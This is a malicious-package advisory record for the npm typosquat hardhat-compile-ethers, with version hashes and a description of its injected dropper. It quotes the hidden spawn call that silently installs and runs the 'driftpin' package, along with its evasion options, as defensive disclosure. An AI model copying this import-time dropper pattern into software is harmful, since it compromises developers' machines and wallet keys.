mal-2026-6705
Vulnerability from ossf_malicious_packages
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (3bb9781577ff17698d2cb66a6cd832fe8bdda014b30c0c662055a45d42801ac1)
The package's main entry dist/src/index.js contains a payload appended after the legitimate Hardhat exports. On require/import (e.g. when Hardhat loads the user's config), it spawns a detached Node child (spawn(process.execPath, ['-e', code], {detached:true, stdio:'ignore', windowsHide:true})) that runs a base64-decoded command to silently npm install driftpin --no-save --silent --no-audit --no-fund, then requires 'driftpin' and invokes getPlugin()(), executing attacker-controlled code in the installer's Node process. Both the shell command and the module name 'driftpin' are base64-encoded to hide them from casual inspection, and the spawn options (detached, stdio ignored, Windows console window hidden) are evasion mechanics. The payload is absent from the TypeScript source (src/index.ts) and only appears in the published dist artifact, indicating post-build injection. The package name mimics legitimate Hardhat/ethers plugins (e.g. @nomicfoundation/hardhat-ethers, hardhat-deploy-ethers) and the README is copied from wighawag/hardhat-deploy, making this a typosquat that delivers a dependency-chain dropper. Installers are typically Hardhat development machines that hold wallet keys and signing material, making arbitrary code execution on import especially damaging.
- CWE-506 - The product contains code that appears to be malicious in nature.
{
"affected": [
{
"database_specific": {
"cwes": [
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
}
],
"indicators": {
"evidence_files": [
{
"path": "dist/src/index.js",
"sha256": "7de1080e1a3fdcfcedbe49bc8d587fb856f3bfc06d8bdc1750f40228fcf45f61",
"tlsh": "e751e2a32797a1302b370fadcb0b1c5663a352932ad891a0f7ed95121f8218951b39c9"
},
{
"path": "package.json",
"sha256": "d5cdd23b692a6e0a213c2a889a398195837f2033e748241c69dee5257beb6dd1",
"tlsh": "41318960cc19cd2307d85595ac7a429361649a470ca6fc2c73a52bbf4f0c2af21b9abd"
}
],
"package_integrity": [
{
"filename": "hardhat-compile-ethers-0.4.7.tgz",
"hashes": {
"sha1": "e718d781b11897329c9747c5fd57a1677ea24110",
"sha512_sri": "sha512-jZX1Kng+W6pbRo0AaYeOa9T9Pw2I3jfP4IS+VPjc2btcfG4qr4IH9o6J352wbyVbVrWO0XDDpb8FfJTaADBneg=="
}
}
]
}
},
"package": {
"ecosystem": "npm",
"name": "hardhat-compile-ethers"
},
"versions": [
"0.4.7",
"0.4.10",
"0.4.12",
"0.4.11",
"0.4.8",
"0.4.6",
"0.4.5",
"0.4.4",
"0.4.2",
"0.4.0",
"0.4.3",
"0.0.1",
"0.4.9"
]
}
],
"credits": [
{
"contact": [
"inspector-research@amazon.com"
],
"name": "Amazon Inspector",
"type": "FINDER"
}
],
"database_specific": {
"malicious-packages-origins": [
{
"id": "IN-MAL-2026-007865",
"import_time": "2026-07-01T19:11:25.632444026Z",
"modified_time": "2026-07-01T18:42:56Z",
"sha256": "180936274762437e2311a83f716cbbf9fcaaaef8e194b950bfa28192bfb44bf8",
"source": "amazon-inspector",
"versions": [
"0.4.7"
]
},
{
"id": "IN-MAL-2026-007863",
"import_time": "2026-07-01T19:11:25.404233578Z",
"modified_time": "2026-07-01T18:42:38Z",
"sha256": "2852e841d953072a439342e58a63f91a6f4047c122d337ad57bc4f4adad45f81",
"source": "amazon-inspector",
"versions": [
"0.4.10"
]
},
{
"id": "IN-MAL-2026-007856",
"import_time": "2026-07-01T19:11:24.475165466Z",
"modified_time": "2026-07-01T18:41:35Z",
"sha256": "3bb9781577ff17698d2cb66a6cd832fe8bdda014b30c0c662055a45d42801ac1",
"source": "amazon-inspector",
"versions": [
"0.4.12"
]
},
{
"id": "IN-MAL-2026-007861",
"import_time": "2026-07-01T19:11:25.142169343Z",
"modified_time": "2026-07-01T18:42:18Z",
"sha256": "51a9a1265ba62d0c900be1a70b6fb28386f2e25cc3e31855fc5b3f58530cae47",
"source": "amazon-inspector",
"versions": [
"0.4.11"
]
},
{
"id": "IN-MAL-2026-007864",
"import_time": "2026-07-01T19:11:25.528163378Z",
"modified_time": "2026-07-01T18:42:46Z",
"sha256": "70318ad0a21e7e2e412adfb362788a771ff49831a01481de94c60d7903634f36",
"source": "amazon-inspector",
"versions": [
"0.4.8"
]
},
{
"id": "IN-MAL-2026-007866",
"import_time": "2026-07-01T19:11:25.775808651Z",
"modified_time": "2026-07-01T18:43:07Z",
"sha256": "95bb3eefd23fcfaf7a9da242c86085f6b7d1cda8344a82a8219789beefe60c12",
"source": "amazon-inspector",
"versions": [
"0.4.6"
]
},
{
"id": "IN-MAL-2026-007870",
"import_time": "2026-07-01T19:11:26.226038725Z",
"modified_time": "2026-07-01T18:43:43Z",
"sha256": "a1d54b1992fb2f6fa590ca2b76dd65574a18a0659f43294aa2fdf0588abe4062",
"source": "amazon-inspector",
"versions": [
"0.4.5"
]
},
{
"id": "IN-MAL-2026-007869",
"import_time": "2026-07-01T19:11:26.129866344Z",
"modified_time": "2026-07-01T18:43:34Z",
"sha256": "d572224fcf90c82c0626008128d7a1fd790e480ec4c3b4fa5292eeb3d610bf81",
"source": "amazon-inspector",
"versions": [
"0.4.4"
]
},
{
"id": "IN-MAL-2026-007867",
"import_time": "2026-07-01T19:11:25.903639151Z",
"modified_time": "2026-07-01T18:43:17Z",
"sha256": "dee0fafd7c2ba309f9b3b1ae8f7e4d54c9d82c630bdbaa176044b9e054cf08c9",
"source": "amazon-inspector",
"versions": [
"0.4.2"
]
},
{
"id": "IN-MAL-2026-007872",
"import_time": "2026-07-01T19:11:26.500370955Z",
"modified_time": "2026-07-01T18:43:59Z",
"sha256": "55a890434cfd92fb846ba508acebf110f286a083dc029651ebecb781528e6f39",
"source": "amazon-inspector",
"versions": [
"0.4.0"
]
},
{
"id": "IN-MAL-2026-007868",
"import_time": "2026-07-01T19:11:26.029254479Z",
"modified_time": "2026-07-01T18:43:25Z",
"sha256": "845a969efc54f4b45826b4bd051aa1adea7c2a983ce97e0665e0c7107f4f2ce3",
"source": "amazon-inspector",
"versions": [
"0.4.3"
]
},
{
"id": "IN-MAL-2026-007871",
"import_time": "2026-07-01T19:11:26.358013817Z",
"modified_time": "2026-07-01T18:43:50Z",
"sha256": "c807ea26446e2a048c154c7a3c035c22db3c42ceede57a307195256a3f11e540",
"source": "amazon-inspector",
"versions": [
"0.0.1"
]
},
{
"id": "IN-MAL-2026-007862",
"import_time": "2026-07-01T19:11:25.289124822Z",
"modified_time": "2026-07-01T18:42:31Z",
"sha256": "d1e4d2af59e7b9e792f78d9335e437080b45295155a778e9d336e23f809e325f",
"source": "amazon-inspector",
"versions": [
"0.4.9"
]
}
]
},
"details": "\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (3bb9781577ff17698d2cb66a6cd832fe8bdda014b30c0c662055a45d42801ac1)\nThe package\u0027s main entry dist/src/index.js contains a payload appended after the legitimate Hardhat exports. On require/import (e.g. when Hardhat loads the user\u0027s config), it spawns a detached Node child (`spawn(process.execPath, [\u0027-e\u0027, code], {detached:true, stdio:\u0027ignore\u0027, windowsHide:true})`) that runs a base64-decoded command to silently `npm install driftpin --no-save --silent --no-audit --no-fund`, then `require(\u0027driftpin\u0027)` and invoke `getPlugin()()`, executing attacker-controlled code in the installer\u0027s Node process. Both the shell command and the module name \u0027driftpin\u0027 are base64-encoded to hide them from casual inspection, and the spawn options (detached, stdio ignored, windows window hidden) are evasion mechanics. The payload is absent from the TypeScript source (src/index.ts) and only appears in the published dist artifact, indicating post-build injection. The package name mimics legitimate Hardhat/ethers plugins (e.g. @nomicfoundation/hardhat-ethers, hardhat-deploy-ethers) and the README is copied from wighawag/hardhat-deploy, making this a typosquat that delivers a dependency-chain dropper. Installers are typically Hardhat development machines that hold wallet keys and signing material, making arbitrary code execution on import especially damaging.\n",
"id": "MAL-2026-6705",
"modified": "2026-07-01T19:13:18Z",
"published": "2026-07-01T18:41:35Z",
"references": [
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.7"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.10"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.12"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.11"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.8"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.6"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.5"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.4"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.2"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.0"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.3"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.0.1"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.9"
}
],
"schema_version": "1.7.4",
"summary": "Malicious code in hardhat-compile-ethers (npm)"
}
Sightings
| Author | Source | Type | Date |
|---|---|---|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.